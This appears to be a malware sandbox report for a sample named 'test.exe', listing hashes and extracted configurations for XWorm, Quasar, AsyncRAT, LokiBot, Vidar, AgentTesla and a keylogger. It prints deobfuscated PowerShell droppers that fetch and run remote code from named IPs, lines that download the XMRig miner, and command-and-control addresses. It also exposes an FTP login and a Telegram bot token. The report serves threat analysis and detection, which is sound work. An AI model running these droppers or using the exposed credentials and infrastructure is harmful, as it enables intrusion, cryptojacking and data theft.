General

  • Target

    test.exe

  • Size

    14.3MB

  • Sample

    250319-d3t2ya1yf1

  • MD5

    8a44ee98217bc81f0869d793eefab1f0

  • SHA1

    4756ed10cbf5dbad09746a8fa2c2e62c2f2b7200

  • SHA256

    c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed

  • SHA512

    4f18f54d791929cb24c02e8865d520e6263c096bef7ebd422578bca0600cadb6ea4b046654ef007ba056bf568ff3a19b068bf4313b4a218953a5bd2ecb0e6a02

  • SSDEEP

    393216:vOWd863huc1dQJlAwF3MnG3InVFedWm7NS/xHWgnHz:2893hr1dQ53MG4VAHsT

Malware Config

Extracted

Language
ps1
Deobfuscated
# powershell snippet 0
$ex8 = "ject Net.WebCli"
$ex5 = "ent).Down"
$ex10 = "(New-Ob"
$ex18 = "loadString('http://92.255.85.66/a.mp4')"
$x = invoke-expression "(New-Object Net.WebClient).DownloadString('http://92.255.85.66/a.mp4')"|invoke-expression

# powershell snippet 1
(new-object net.webclient).downloadstring("http://92.255.85.66/a.mp4")
URLs
ps1.dropper

http://92.255.85.66/a.mp4

Extracted

Language
ps1
Deobfuscated
# powershell snippet 0
$rx61 = "ject Net.WebCli"
$rx49 = "ent).Down"
$rx19 = "(New-Ob"
$rx77 = "loadString('http://92.255.57.221/a.mp4')"
$x = invoke-expression "(New-Object Net.WebClient).DownloadString('http://92.255.57.221/a.mp4')"|invoke-expression

# powershell snippet 1
(new-object net.webclient).downloadstring("http://92.255.57.221/a.mp4")
URLs
ps1.dropper

http://92.255.57.221/a.mp4

Extracted

Language
ps1
Deobfuscated
$wc = new-object system.net.webclient
$wc.downloadfile("http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys", "C:\\Users\\Admin\\c3pool\\WinRing0x64.sys")
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys

Extracted

Language
ps1
Deobfuscated
$wc = new-object system.net.webclient
$wc.downloadfile("http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json", "C:\\Users\\Admin\\c3pool\\config.json")
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json

Extracted

Language
ps1
Deobfuscated
$wc = new-object system.net.webclient
$wc.downloadfile("http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe", "C:\\Users\\Admin\\c3pool\\xmrig.exe")
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe

Extracted

Language
ps1
Deobfuscated
$wc = new-object system.net.webclient
$wc.downloadfile("http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe", "C:\\Users\\Admin\\c3pool\\nssm.exe")
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe

Extracted

Family

xworm

Version

5.0

C2

92.255.85.2:4372

92.255.57.221:4414

116.250.190.209:4567

92.255.85.66:7000

178.173.236.10:7000

127.0.0.1:7000

Mutex

bFh8cGGVyBJ2hXxI

Attributes
  • install_file

    USB.exe

aes.plain
9v2dudD5rEHuQVreZRHaZA==
aes.plain
uYupww/sw+IGL1B9UruAfA==
aes.plain
cgTvd19QUOmd64/Mtyss1A==
aes.plain
wkx68kU0Sfs68dC2cbalMg==
aes.plain
VO/93dcBf6erbIqNrOz4EA==
aes.plain
V6msw5Nfs+5TrYHI1+Irdw==

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://176.65.144.3
  • Port:
    21
  • Username:
    Believe
  • Password:
    Believe56@@

Extracted

Family

vidar

Version

13.2

Botnet

f083f1f6fa006fbbc744aa9888fb3e8a

C2

https://t.me/g_etcontent

https://steamcommunity.com/profiles/76561199832267488

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0

Extracted

Family

lumma

C2


Extracted

Family

vipkeylogger

C2

https://api.telegram.org/bot7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o/sendMessage?chat_id=6163418482

Extracted

Family

quasar

Version

176.65.144.14:4567;

Botnet

tiktok

C2

https://pastebin.com/raw/5KMaxFkV

Mutex

6b91ceb8-fdf6-44ae-8d03-cf7d52a55ba9

Attributes
  • encryption_key

    6DB4822E80CF23FD4665B760183906FE57378512

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Chrome Updated

  • subdirectory

    SubDir

Extracted

Family

lokibot

C2

http://bauxx.xyz/mtk1/w2/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

asyncrat

Version

A 13

Botnet

Default

C2

163.172.125.253:333

Mutex

AsyncMutex_555223

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain
HnPfeFjKVRhCBNV6iN1GKQsEOU3LOTny

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

127.0.0.1:4782

Mutex

978b297b-bd79-47da-aff5-5421661f9499

Attributes
  • encryption_key

    0DDB9B0261808BADD198F8317E24CEF19CD13885

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

quasar

Version

1.3.0.0

Botnet

sigorta

C2

213.238.177.46:1604

Mutex

QSR_MUTEX_dxT1m3RtSBLlUoRqXL

Attributes
  • encryption_key

    AZfjKXCnqT1oHdxEyyKo

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Targets

MITRE ATT&CK Enterprise v15

Tasks
